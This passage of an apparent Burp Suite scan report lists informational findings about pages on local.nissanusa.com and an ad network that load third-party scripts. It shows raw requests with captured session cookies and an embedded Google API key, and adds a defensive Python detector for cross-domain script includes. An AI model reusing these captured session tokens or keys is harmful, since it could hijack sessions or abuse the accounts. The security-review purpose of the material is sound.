Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:53:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:53:11 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=02901; expires=Sat, 05-Feb-2011 04:53:11 GMT; path=/
Set-Cookie: localDMA=providence-new-bedford-area; expires=Sat, 05-Feb-2011 04:53:11 GMT; path=/
Content-Length: 162269

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...
<!-- BEGIN: Google Map -->
<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.248. http://local.nissanusa.com/sacramento-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /sacramento-area

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /sacramento-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:57:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:57:23 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=95814; expires=Sat, 05-Feb-2011 04:57:22 GMT; path=/
Set-Cookie: localDMA=sacramento-area; expires=Sat, 05-Feb-2011 04:57:22 GMT; path=/
Content-Length: 129688

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...
<!-- BEGIN: Google Map -->
<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.249. http://local.nissanusa.com/salt-lake-city-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /salt-lake-city-area

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /salt-lake-city-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:55:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:55:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=84101; expires=Sat, 05-Feb-2011 04:55:25 GMT; path=/
Set-Cookie: localDMA=salt-lake-city-area; expires=Sat, 05-Feb-2011 04:55:25 GMT; path=/
Content-Length: 109201

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...
<!-- BEGIN: Google Map -->
<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.250. http://local.nissanusa.com/san-antonio-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /san-antonio-area

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /san-antonio-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:53:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:53:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=78201; expires=Sat, 05-Feb-2011 04:53:34 GMT; path=/
Set-Cookie: localDMA=san-antonio-area; expires=Sat, 05-Feb-2011 04:53:34 GMT; path=/
Content-Length: 106603

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...
<!-- BEGIN: Google Map -->
<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.251. http://local.nissanusa.com/san-diego-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /san-diego-area

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /san-diego-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:57:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:57:00 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=92101; expires=Sat, 05-Feb-2011 04:56:59 GMT; path=/
Set-Cookie: localDMA=san-diego-area; expires=Sat, 05-Feb-2011 04:56:59 GMT; path=/
Content-Length: 138834

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...
<!-- BEGIN: Google Map -->
<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.252. http://local.nissanusa.com/san-francisco-oakland-san-jose-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /san-francisco-oakland-san-jose-area

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /san-francisco-oakland-san-jose-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:56:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:56:52 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=94101; expires=Sat, 05-Feb-2011 04:56:51 GMT; path=/
Set-Cookie: localDMA=san-francisco-oakland-san-jose-area; expires=Sat, 05-Feb-2011 04:56:51 GMT; path=/
Content-Length: 130539

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...
<!-- BEGIN: Google Map -->
<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.253. http://local.nissanusa.com/seattle-tacoma-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /seattle-tacoma-area

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /seattle-tacoma-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:57:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:57:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: downScroll=deleted; expires=Fri, 29-Jan-2010 04:57:23 GMT
Set-Cookie: localZIP=98101; expires=Sat, 05-Feb-2011 04:57:24 GMT; path=/
Set-Cookie: localDMA=seattle-tacoma-area; expires=Sat, 05-Feb-2011 04:57:24 GMT; path=/
Content-Length: 118363

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...
<!-- BEGIN: Google Map -->
<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.254. http://local.nissanusa.com/st-louis-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /st-louis-area

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /st-louis-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:52:05 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:52:05 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=63101; expires=Sat, 05-Feb-2011 04:52:04 GMT; path=/
Set-Cookie: localDMA=st-louis-area; expires=Sat, 05-Feb-2011 04:52:04 GMT; path=/
Content-Length: 111818

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...
<!-- BEGIN: Google Map -->
<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.255. http://local.nissanusa.com/tampa-st-petersburg-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /tampa-st-petersburg-area

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /tampa-st-petersburg-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:55:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:55:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=33601; expires=Sat, 05-Feb-2011 04:55:27 GMT; path=/
Set-Cookie: localDMA=tampa-st-petersburg-area; expires=Sat, 05-Feb-2011 04:55:27 GMT; path=/
Content-Length: 126968

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...
<!-- BEGIN: Google Map -->
<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.256. http://local.nissanusa.com/washington-dc-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /washington-dc-area

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /washington-dc-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:52:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:52:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=20001; expires=Sat, 05-Feb-2011 04:52:34 GMT; path=/
Set-Cookie: localDMA=washington-dc-area; expires=Sat, 05-Feb-2011 04:52:34 GMT; path=/
Content-Length: 156002

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...
<!-- BEGIN: Google Map -->
<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.257. http://local.nissanusa.com/wilkes-barre-scranton-pa-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /wilkes-barre-scranton-pa-area

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /wilkes-barre-scranton-pa-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:53:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:53:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=18701; expires=Sat, 05-Feb-2011 04:53:14 GMT; path=/
Set-Cookie: localDMA=wilkes-barre-scranton-pa-area; expires=Sat, 05-Feb-2011 04:53:14 GMT; path=/
Content-Length: 165898

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...
<!-- BEGIN: Google Map -->
<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.258. http://network.realmedia.com/3/bostonherald/ros/728x90/jx/ss/a/L31@Top1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /3/bostonherald/ros/728x90/jx/ss/a/L31@Top1

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /3/bostonherald/ros/728x90/jx/ss/a/L31@Top1 HTTP/1.1
Host: network.realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; SDataR=1; NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; OAX=rcHW800pDrcAAovp; SData=,D41D8CD98F00B204E9800998ECF8427E; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5i|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O2016F7|OA016Of; S247S=1; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:05:22 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1021
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 05:06:22 GMT;path=/

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="2"; var zflag_sid="2"; var zflag_width="728"; var zflag_height="90"; var zflag_sz="14"; var zf
...[SNIP]...
</script>\n');
document.write ('<script language="JavaScript" src="http://d3.zedo.com/jsc/d3/fo.js"></script>
...[SNIP]...
</script>\n');
document.write ('<script type="text/javascript" src="http://syndication.mmismm.com/mmtnt.php">\n');
document.write ('</script><script type="text/javascript" src="http://tcla.mmismm.com/mmmss.php?mm_pub=87268797280&mm_pub_channel=bostonherald/ros/728x90/jx/ss/a/L31/L12&mm_flag="></script>
...[SNIP]...
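
The findings above are all of the same kind: the page's own response pulls executable script from a host the page does not control. In 18.254 through 18.257 the scripts are ordinary <script src=...> tags in HTML (www.google.com and js.revsci.net); in 18.258 and the realmedia.com entries that follow, the response is itself JavaScript that emits its <script> tags through document.write('...'), which a naive HTML parser never sees. The following is an added example of the check the scanner is performing, written for this edit and not taken from the report or from Burp. It runs the same detection over a raw response body, catching both the plain tags and the ones wrapped in document.write strings. The two sample bodies are constructed to match the shapes in the report: the third-party hosts (www.google.com, js.revsci.net, d3.zedo.com, syndication.mmismm.com, tcla.mmismm.com) are the ones visible in the captures, while /static/local.js, key=EXAMPLE and static.example.net are made up to exercise the same-origin and escaped-quote cases.

```python
import re
from urllib.parse import urlsplit

# Constructed sample inputs. The first mirrors the HTML pages from
# local.nissanusa.com in this report (plain <script src=...> tags, plus one
# same-origin script added for contrast); the second mirrors the
# network.realmedia.com ad responses, which are JavaScript that emits its
# <script> tags through document.write('...'). The static.example.net line is
# made up to exercise a backslash-escaped attribute quote inside a JS string.
SAMPLE_HTML = """<html><head>
<script type='text/javascript' src='http://www.google.com/jsapi?key=EXAMPLE'></script>
<script type="text/javascript" src="/static/local.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
</head></html>"""

SAMPLE_JS = r"""document.write ('<script language="JavaScript" src="http://d3.zedo.com/jsc/d3/fo.js"></script>\n');
document.write ('<script type="text/javascript" src="http://syndication.mmismm.com/mmtnt.php">\n');
document.write ('</script><script type="text/javascript" src="http://tcla.mmismm.com/mmmss.php?mm_pub=1&mm_flag="></script>');
document.write ('<script src=\'http://static.example.net/x.js\'></script>');
"""

# src attribute of a <script> tag, either quote style, with an optional
# backslash allowed before each quote so tags embedded in JS string literals
# still match. Applied to the raw body, so document.write payloads are seen.
SCRIPT_SRC = re.compile(
    r"<script\b[^>]*?\bsrc\s*=\s*\\?(?P<q>['\"])(?P<src>.*?)\\?(?P=q)",
    re.IGNORECASE | re.DOTALL,
)


def script_srcs(body):
    """All script src values in document order, same-origin ones included."""
    return [m.group("src").strip() for m in SCRIPT_SRC.finditer(body)]


def cross_domain_scripts(page_host, body):
    """Map each third-party host to the script URLs the body loads from it.

    Relative paths (no host) are same-origin and skipped. Scheme-relative
    URLs (//host/...) are parsed with a borrowed scheme so the host is kept.
    Host comparison is case-insensitive; the original src text is reported.
    """
    page_host = page_host.lower()
    found = {}
    for src in script_srcs(body):
        target = "http:" + src if src.startswith("//") else src
        host = urlsplit(target).hostname          # already lower-cased by urlsplit
        if host is None or host == page_host:
            continue
        found.setdefault(host, []).append(src)
    return found


if __name__ == "__main__":
    for page, body in (("local.nissanusa.com", SAMPLE_HTML),
                       ("network.realmedia.com", SAMPLE_JS)):
        print(page)
        for host, urls in cross_domain_scripts(page, body).items():
            for url in urls:
                print("  includes script from", host, "->", url)
```

The scanner rates these "Information" because the finding is not a bug in the page's own code but a trust decision: every listed host can run arbitrary script in the including origin, read any cookie not flagged HttpOnly, and rewrite the page, so a compromise of an ad or analytics provider becomes a compromise of the page. The check above has the same blind spot as any body-level scan: scripts assembled by string concatenation or inserted via createElement at runtime are only visible in a browser, not in the response text.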

18.259. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1065387053@Top1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1065387053@Top1

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1065387053@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
